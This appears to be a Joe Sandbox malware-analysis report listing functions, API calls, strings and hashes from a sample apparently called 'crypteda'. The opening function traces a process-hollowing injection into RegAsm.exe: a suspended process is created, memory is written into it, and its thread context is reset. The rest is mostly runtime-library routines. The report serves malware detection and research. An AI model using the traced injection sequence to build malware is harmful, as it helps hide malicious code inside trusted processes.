Disassembly available

Executed Functions

Function 02C8256D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C824DF,02C824CF), ref: 02C826DC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02C826EF
Wow64GetThreadContext.KERNEL32(000002EC,00000000), ref: 02C8270D
ReadProcessMemory.KERNELBASE(000002F0,?,02C82523,00000004,00000000), ref: 02C82731
VirtualAllocEx.KERNELBASE(000002F0,?,?,00003000,00000040), ref: 02C8275C
WriteProcessMemory.KERNELBASE(000002F0,00000000,?,?,00000000,?), ref: 02C827B4
WriteProcessMemory.KERNELBASE(000002F0,00400000,?,?,00000000,?,00000028), ref: 02C827FF
WriteProcessMemory.KERNELBASE(000002F0,?,?,00000004,00000000), ref: 02C8283D
Wow64SetThreadContext.KERNEL32(000002EC,02C40000), ref: 02C82879
ResumeThread.KERNELBASE(000002EC), ref: 02C82888

Strings

VirtualAllocEx, xrefs: 02C8266D
GetThreadContext, xrefs: 02C82647
Load, xrefs: 02C825AB
WriteProcessMemory, xrefs: 02C82680
SetThreadContext, xrefs: 02C82693
GetP, xrefs: 02C825EF
aryA, xrefs: 02C825B3
ReadProcessMemory, xrefs: 02C8265A
ress, xrefs: 02C825F7
ResumeThread, xrefs: 02C826A9
VirtualAlloc, xrefs: 02C82634
TerminateProcess, xrefs: 02C8276B
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02C826DB
CreateProcessA, xrefs: 02C82621

Memory Dump Source

Source File: 00000018.00000002.1918805597.0000000002C82000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C82000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2c82000_crypteda.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: ad5e63380a10cf2c125b798f2a2d9c661e0e6c414da635a2eb9ca0264373a189
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: 88B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158124EA0CAB341D774FA41CB94

Function 02C11001 Relevance: 1.6, APIs: 1, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02C11082

Memory Dump Source

Source File: 00000018.00000002.1918622443.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2c10000_crypteda.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: eb0d1afdd94c09df98effa623c446a077cd0896c8847fb8d73d41679226b2682
Instruction ID: 855afb1016924553d040b7349553bafea120ff084ff65e3793b387a85d50383b
Opcode Fuzzy Hash: eb0d1afdd94c09df98effa623c446a077cd0896c8847fb8d73d41679226b2682
Instruction Fuzzy Hash: 172112B1D00259AFCB10DFAAC881BDEFBB4FF48310F50852AE918A7240C7796910CBA5

Function 02C11008 Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02C11082

Memory Dump Source

Source File: 00000018.00000002.1918622443.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_2c10000_crypteda.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2acedd263b280be1bf176c6263a189b41f7c66a0c7843b8c76406b09526902a8
Instruction ID: 17dd43940a8aed353de3bbc1456d6f318a28435761f37aa80d84c5eb1b687c8b
Opcode Fuzzy Hash: 2acedd263b280be1bf176c6263a189b41f7c66a0c7843b8c76406b09526902a8
Instruction Fuzzy Hash: 322102B1D002599BDB10DFAAC881BDEFBB4FB48310F50852AE918A7240C7795910CBA4

Analysis Process: RegAsm.exePID: 5604, Parent PID: 7352COMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	60

Executed Functions

Function 0041FE9D Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041FB56: CreateFileW.KERNELBASE(?,00000000,?,0041FF46,?,?,00000000,?,0041FF46,?,0000000C), ref: 0041FB73

GetLastError.KERNEL32 ref: 0041FFB1
__dosmaperr.LIBCMT ref: 0041FFB8
GetFileType.KERNELBASE(00000000), ref: 0041FFC4
GetLastError.KERNEL32 ref: 0041FFCE
__dosmaperr.LIBCMT ref: 0041FFD7
CloseHandle.KERNEL32(00000000), ref: 0041FFF7
CloseHandle.KERNEL32(?), ref: 00420144
GetLastError.KERNEL32 ref: 00420176
__dosmaperr.LIBCMT ref: 0042017D

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 8a6ad238e456dfb5c6acf6d43a8fdbc71dc0bcedd465f29062b7f109bfad7472
Instruction ID: bfa7e2cc036e27e26c30110013f893a37d44138e153881355e96e1974d99462b
Opcode Fuzzy Hash: 8a6ad238e456dfb5c6acf6d43a8fdbc71dc0bcedd465f29062b7f109bfad7472
Instruction Fuzzy Hash: 6AA14832A041148FCF19EF68EC91BAE3BA0AB06314F14016EF801EB3D2C7799857DB59

Function 004038B0 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 401
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(shell32.dll), ref: 004038FA

Strings

` H, xrefs: 0040392E
.exe, xrefs: 004039D4, 004039E5, 00403C18, 00403C29
open, xrefs: 00403DF4, 00403E15
shell32.dll, xrefs: 004038F5

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .exe$` H$open$shell32.dll
API String ID: 1029625771-2834257608
Opcode ID: d4c97a5889b133242607335a8d42e56c099b9df17a057e4e584b721371644320
Instruction ID: 857efcede616dcd8c83fca5595c578517c5b7e2349eff73c2340159bc27b1389
Opcode Fuzzy Hash: d4c97a5889b133242607335a8d42e56c099b9df17a057e4e584b721371644320
Instruction Fuzzy Hash: F7E118312083408BE328DF28CD45B6FBBE5BF85305F144A2DF485AB2D2D779E5458B9A

Function 00411422 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0041141C,00000016,0040BD88,?,?,FD7B20F3,0040BD88,?), ref: 00411433
TerminateProcess.KERNEL32(00000000,?,0041141C,00000016,0040BD88,?,?,FD7B20F3,0040BD88,?), ref: 0041143A
ExitProcess.KERNEL32 ref: 0041144C

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction ID: 9f5cffd960a9e5e784bd49b974cdbcfa3e36e1e28e8dab912b0267a8a3414f4f
Opcode Fuzzy Hash: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction Fuzzy Hash: 76D09E31100508AFCF117F61DC0DA993F2AAF44745B858025BA0556131CB3A9993EA5D

Function 00416D9F Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004164B2: GetConsoleOutputCP.KERNEL32(FD7B20F3,00000000,00000000,0040BDA8), ref: 00416515

WriteFile.KERNELBASE(FFBF5BE8,00000000,?,0040BC65,00000000,00000000,00000000,00000000,?,?,0040BC65,?,?,004328B8,00000010,0040BDA8), ref: 00416F08
GetLastError.KERNEL32(?,0040BC65,?,?,004328B8,00000010,0040BDA8,?,?,00000000,?), ref: 00416F12

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction ID: 2fa65d471856ac80343e11fa98bfc53c13d7c1330e77fa5001ed2fcda6fa269c
Opcode Fuzzy Hash: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction Fuzzy Hash: 9F61D675D00249AFDF10DFA9C844AEF7FB9AF09308F16415AF800A7252D339D986CB69

Function 00414D4D Relevance: 3.1, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00414C34,00000000,CF830579,00432C48,0000000C,00414CF0,0040BCFB,?), ref: 00414DA3
GetLastError.KERNEL32(?,00414C34,00000000,CF830579,00432C48,0000000C,00414CF0,0040BCFB,?), ref: 00414DAD

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction ID: 85074f4f6ff141bd7efcce855698502eef5de44000b51f9bf88cca9df30e92f5
Opcode Fuzzy Hash: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction Fuzzy Hash: 77114C326041105ACB206675BC857FE27459BD2738F25025FF908C72C2EB388CC1529D

Function 00403ED0 Relevance: 3.0, APIs: 2, Instructions: 22
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004038B0,00000000,00000000,FD7B20F3), ref: 00403EF6
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403EFF

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: 9419f3325bceeff1f49f4aa1ba74e54397c78aa36a806008d2e466c127b4d74a
Instruction ID: 586eb301f3ad505b2fb8a5e2c0845f04df15ed7da879dad1818cca3ffdf321d7
Opcode Fuzzy Hash: 9419f3325bceeff1f49f4aa1ba74e54397c78aa36a806008d2e466c127b4d74a
Instruction Fuzzy Hash: 7EE08675748300ABD720FF24DC07F1A3BE4BB48B01F914A39F595A62D0D6747404965E

Function 004143BC Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction ID: 2b8528776d8d16502f0b8a76a82d10506d50424a6c704f85483994a1d03f90d6
Opcode Fuzzy Hash: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction Fuzzy Hash: 9D012D377001255FDF25CE6EEC40BDB3396EBC47243548536F914DB544DA34D8829759

Function 00413EE2 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00413F1C

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: caa3c88317b3bbee83e5854bbea9c678844db8772e50a39c133be3f8c5400fb7
Instruction ID: ec9553a80a63d261aca480410fc230252e3ea256619d772961208cbce9478613
Opcode Fuzzy Hash: caa3c88317b3bbee83e5854bbea9c678844db8772e50a39c133be3f8c5400fb7
Instruction Fuzzy Hash: F6111871A0420AAFCF05DF58E9419DF7BF4EF48304F0440AAF805AB351D631DA15CBA8

Function 0041FB56 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,00000000,?,0041FF46,?,?,00000000,?,0041FF46,?,0000000C), ref: 0041FB73

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction ID: 28cfbda6749b70c9de2fbd9d245fef773b8951bf2dd70127050a9a6bf190398c
Opcode Fuzzy Hash: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction Fuzzy Hash: 05D06C3210010DFBDF128F84DC06EDA3FAAFB4C714F018010FA5856021C732E832AB94

Non-executed Functions

Function 0041EB91 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(3FC00000,2000000B,0041EEAF,00000002,00000000,?,?,?,0041EEAF,?,00000000), ref: 0041EC2A
GetLocaleInfoW.KERNEL32(3FC00000,20001004,0041EEAF,00000002,00000000,?,?,?,0041EEAF,?,00000000), ref: 0041EC53
GetACP.KERNEL32(?,?,0041EEAF,?,00000000), ref: 0041EC68

Strings

ACP, xrefs: 0041EBAF
OCP, xrefs: 0041EBE5

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction ID: c85fc144d60ddc6525dae33cd09e0d060d1fedf04b2ffe12a12074c054b5e7b8
Opcode Fuzzy Hash: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction Fuzzy Hash: 0D218E3A704104EADB38CF16CD05AD772A6AB54B54B5A8426ED0AD7304F73ADEC1C798

Function 0041ED66 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0041EE72
IsValidCodePage.KERNEL32(00000000), ref: 0041EEBB
IsValidLocale.KERNEL32(?,00000001), ref: 0041EECA
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041EF12
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041EF31

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: cb1f43e0842fc1b57530168fcb5aadb50c479eb7f68bca799765aa874482350f
Instruction ID: 6dcde63b9ee3f13586b647639649f64518bbb4cfa058cf0b9fa01e7f3d3dbd24
Opcode Fuzzy Hash: cb1f43e0842fc1b57530168fcb5aadb50c479eb7f68bca799765aa874482350f
Instruction Fuzzy Hash: 2951A075A00206ABDF20EFA6DC45AEB77B8BF04700F49452AED11E7290D7789981CB69

Function 0041E402 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetACP.KERNEL32(?,?,?,?,?,?,00411ED1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E4C3
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00411ED1,?,?,?,00000055,?,-00000050,?,?), ref: 0041E4EE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E651

Strings

utf8, xrefs: 0041E5C0

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 1eb3fb8f5e23b37753c7c554b08859c7808b39e1099525de27aec97b4695ee5a
Instruction ID: e1a377e19c5f71cd44c11824ea9e35987c280acd53c56ff76f51ea565ef0af36
Opcode Fuzzy Hash: 1eb3fb8f5e23b37753c7c554b08859c7808b39e1099525de27aec97b4695ee5a
Instruction Fuzzy Hash: AB71F779A00201BADB24AB77CC46BEB73A9EF44718F14442BFD05D7281FA7CE9818659

Function 00415625 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004156B2

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction ID: a35172905f2c9e80df687ae2f548e4ff91b5a56ee58bfd6494556f9989062819
Opcode Fuzzy Hash: d8f824a3a597dbe048be884bb3e91045552750dfa5ffe6b567c0d7537b351b3d
Instruction Fuzzy Hash: 44B16A72E00655DFDB11DF68C8817EEBBA5EF85310F14416BE815AB381D238DD81CBA9

Function 00407AF1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407AFD
IsDebuggerPresent.KERNEL32 ref: 00407BC9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407BE9
UnhandledExceptionFilter.KERNEL32(?), ref: 00407BF3

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction ID: e6d40a2ad45d1a0383389914ec1c7b177219f7559a83785ff08c1c1c590c79bb
Opcode Fuzzy Hash: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction Fuzzy Hash: 76314975D0521CDBDB21DFA0D989BCDBBB8BF08304F1040AAE40DAB290EB755A85CF49

Function 0041E815 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E869
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E8B3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E979

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 70364720e12663236a414e2dcb1dce5353f717cfc86153b9853f2e5e3999c068
Instruction ID: 519a0177cb526aaaa458b2f6b8e716251f3c0a2969a148864a23d158d411bc59
Opcode Fuzzy Hash: 70364720e12663236a414e2dcb1dce5353f717cfc86153b9853f2e5e3999c068
Instruction Fuzzy Hash: 9B617B75A102079FEB289F26CD82BEA77A8FF44354F14417AED05C6681E738E981CB58

Function 0040DD68 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 0040DE60
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0040DE6A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 0040DE77

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c9299be453f233d1f34e7b439eda9d176e6efb048eb56d82e46d8d1a49e6a2a2
Instruction ID: d2f4f48b52c025ad6b33b38734eeeb510d7991f02fac7d06ce453438f3003fcc
Opcode Fuzzy Hash: c9299be453f233d1f34e7b439eda9d176e6efb048eb56d82e46d8d1a49e6a2a2
Instruction Fuzzy Hash: A731C574D012289BCB21DF65D98978DBBB4BF58310F5041EAE41CA7290E7749F858F49

Function 0041B6DA Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 240dabf42296fc0716cf1df3a365cfd0642dfbeb5de634df910a17514a9db46b
Instruction ID: a6190f5805de9a564eec38dffe1fad162b0df58d225cb52605cfe5cd4e5bec91
Opcode Fuzzy Hash: 240dabf42296fc0716cf1df3a365cfd0642dfbeb5de634df910a17514a9db46b
Instruction Fuzzy Hash: 8A41A2B5904219AFDB20DF69CC89AEEBBB8EF45304F1441DEE418D3201DB359E858F54

Function 0041EA68 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041EABC

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 9d790b3c45bb2bf0643d5e8ab68d8f402ebc04587a63254904ddd76dacdf4023
Instruction ID: 789565f62a9f3b81efb00754059a0722f9dd97d30215528fd29c40c366a42c5d
Opcode Fuzzy Hash: 9d790b3c45bb2bf0643d5e8ab68d8f402ebc04587a63254904ddd76dacdf4023
Instruction Fuzzy Hash: F1217136605206ABDB28DE26DC42AFB77A8EF44714B10407FFD06D6241EB79BD81CA58

Function 0041E6EF Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

EnumSystemLocalesW.KERNEL32(0041E815,00000001,00000000,?,-00000050,?,0041EE46,00000000,?,?,?,00000055,?), ref: 0041E761

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c41bd8c13944af45959f55b7b285689f368a5b2ee216d29e3bbf5953bd320f82
Instruction ID: 3355e78b0c1919935c13ae0f7f932fd25516bb8159513c05bc37ad2f76743b3e
Opcode Fuzzy Hash: c41bd8c13944af45959f55b7b285689f368a5b2ee216d29e3bbf5953bd320f82
Instruction Fuzzy Hash: 6911E93B6007019FEB189F3AD8916FAB791FF80358B19442EE99687740E7757983C744

Function 0041EC97 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0041EB12,00000000,00000000,?), ref: 0041ECC3

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction ID: a74d281951bb25d9d225ee6b49b477873636137a5a6801bc69a0b20bd4e45b62
Opcode Fuzzy Hash: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction Fuzzy Hash: BCF0A93AA00126BFDB245A269C45BFB7764EB40754F15442AED07A3280EA78FE82C6D4

Function 0041E5FD Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E651

Strings

utf8, xrefs: 0041E5C0

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: d3c02c1389eacca91a5e291a11e928c47885a93e678f07e32e4ca4d141b25baf
Instruction ID: c8b41ea417b063d59171f4d5afc3dd36f9caaff362045ecd69b67607d46fe07f
Opcode Fuzzy Hash: d3c02c1389eacca91a5e291a11e928c47885a93e678f07e32e4ca4d141b25baf
